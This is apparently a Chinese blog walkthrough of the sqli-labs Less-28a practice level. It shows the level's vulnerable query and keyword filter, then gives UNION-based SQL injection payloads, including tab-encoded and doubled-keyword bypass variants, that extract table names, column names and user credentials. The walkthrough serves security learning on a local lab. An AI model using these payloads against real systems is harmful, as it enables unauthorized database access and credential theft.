sqli-labs:Less-28a关卡详细解析

1. 思路🚀

本关的SQL语句为:

sql 复制代码
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
  • 注入类型:字符串型(单引号、括号包裹)、GET操作
  • 提示:参数需以')闭合
  • 关键参数:id

php输出语句的部分代码:

php 复制代码
if($row)
{
  	echo "<font size='5' color= '#99FF00'>";	
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
}
else 
{
	echo '<font color= "#FFFF00">';
	// print_r(mysql_error());
	echo "</font>";  
}

语句print_r(mysql_error());被注释,本关卡不可以使用报错盲注。而且相比关卡28,对字符的过滤仅有unionselect,因此关卡28的解法可以拿来直接用,替换规则如下。(重点关注unionselect的过滤)

  • 空格%09替换
  • unionunion%09union替换
  • selectselect%09select替换
php 复制代码
function blacklist($id)
{
   //$id= preg_replace('/[\/\*]/',"", $id);				//strip out /*
   //$id= preg_replace('/[--]/',"", $id);				//Strip out --.
   //$id= preg_replace('/[#]/',"", $id);				//Strip out #.
   //$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
   //$id= preg_replace('/select/m',"", $id);	   		//Strip out spaces.
   //$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
   $id= preg_replace('/union\s+select/i',"", $id);	    //Strip out spaces.
   return $id;
}

2. 手工注入步骤🎯

我的地址栏是:http://localhost:8081/Less-28a/,从?id=开始,只需要将下面的sql语句粘贴即可。同时我将sql注入源语句和变体语句放在下面,方便观察。

2.1. 获取基本信息⚡

url 复制代码
999') union select 1,database(),3 where ('1'='1
url 复制代码
999')%09union%09union%09select%09select%091,database(),3%09where%09('1'='1

2.2. 获取表名⚡

url 复制代码
999') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' and ('1'='1
url 复制代码
999')%09union%09union%09select%09select%091,group_concat(table_name)%09,3%09from%09information_schema.tables%09where%09table_schema%09=%09'security'%09and%09('1'='1

2.3. 获取字段⚡

url 复制代码
999') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = 'security' and table_name = 'users' and ('1'='1
url 复制代码
999')%09union%09union%09select%09select%091,group_concat(column_name)%09,3%09from%09information_schema.columns%09where%09table_schema%09=%09'security' and%09table_name%09=%09'users'%09and%09('1'='1

2.4. 获取数据⚡

url 复制代码
999') union select 1,group_concat(username),3 from users where ('1'='1
url 复制代码
# 账号
999')%09union%09union%09select%09select%091,group_concat(username),3%09from%09users%09where%09('1'='1
url 复制代码
# 密码
999')%09union%09union%09select%09select%091,group_concat(password),3%09from%09users%09where%09('1'='1

2.5. 参数汇总表⭐

参数 作用 示例
') 闭合符号 id=1')
union select 联合查询 union select 1,2,3
group_concat() 合并结果 group_concat(table_name)
information_schema 系统数据库 from information_schema.tables
table_schema 数据库名称 table_schema='security'
table_name 数据表名称 table_name='users'
column_name 字段名称 group_concat(column_name)

3. 总结🏁

关卡中代码对许多字符进行过滤来防止SQL注入,但我们仍可通过替换相应内容(如union%09union)、逻辑运算符替代或URL编码的方式等方式轻松绕过。

相似的关卡1解析,见"sqli-labs:Less-28关卡详细解析"
https://blog.csdn.net/qq_62000508/article/details/149915055?spm=1011.2415.3001.5331

相似的关卡2解析,见"sqli-labs:Less-27a关卡详细解析"
https://blog.csdn.net/qq_62000508/article/details/149914363?spm=1011.2415.3001.5331

基础的联合注入关卡解析,见"sqli-labs:Less-2关卡详细解析"
https://blog.csdn.net/qq_62000508/article/details/149775774?spm=1011.2415.3001.5331


声明:本文仅用于安全学习,严禁非法测试! ❗❗❗

相关推荐
sdm0704278 天前
多路转接-select
网络·c++·select·多路转接
lcreek12 天前
SQL盲注漏洞详解 DVWA High
网络安全·sql注入
lcreek13 天前
SQL 注入漏洞详解:从原理到防御的完整学习指南
网络安全·sql注入
minji...13 天前
MySQL数据库 (七) MySQL表的基本查询(上),insert、replace、select、where、order by
数据库·mysql·select·replace·insert·order by·where
三垣网安13 天前
记一次补天公益SRC漏洞挖掘:弱口令+SQL注入+信息泄露
sql注入·信息泄露·弱口令
lcreek14 天前
SQL盲注漏洞详解 DVWA Medium
网络安全·sql注入
lcreek15 天前
SQL 注入实战:DVWA High 完整测试指南
网络安全·sql注入
lcreek16 天前
SQL 注入实战:DVWA Medium完整测试指南
网络安全·sql注入
lcreek16 天前
SQL 注入实战:DVWA LOW完整测试指南
网络安全·sql注入
Irissgwe18 天前
12、多路转接 select
linux·io多路转接·select